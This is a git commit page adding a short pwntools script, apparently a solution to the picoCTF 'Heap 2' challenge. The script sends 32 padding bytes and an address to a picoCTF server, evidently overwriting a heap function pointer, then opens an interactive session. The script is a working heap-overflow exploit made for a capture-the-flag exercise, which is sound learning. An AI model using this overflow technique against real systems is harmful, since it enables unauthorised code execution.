Heap 2
This commit is contained in:
15
heap_2/sol.py
Executable file
15
heap_2/sol.py
Executable file
@@ -0,0 +1,15 @@
|
||||
#!/home/maxime/.pyvenv/bin/python3
|
||||
from pwn import *
|
||||
|
||||
conn = connect("mimas.picoctf.net", 51447)
|
||||
|
||||
conn.recvuntil(b':')
|
||||
|
||||
conn.sendline(b'2')
|
||||
|
||||
conn.recvuntil(b':')
|
||||
|
||||
conn.sendline(b'0' * 32 + b'\xa0\x11\x40')
|
||||
|
||||
conn.interactive()
|
||||
|
||||
Reference in New Issue
Block a user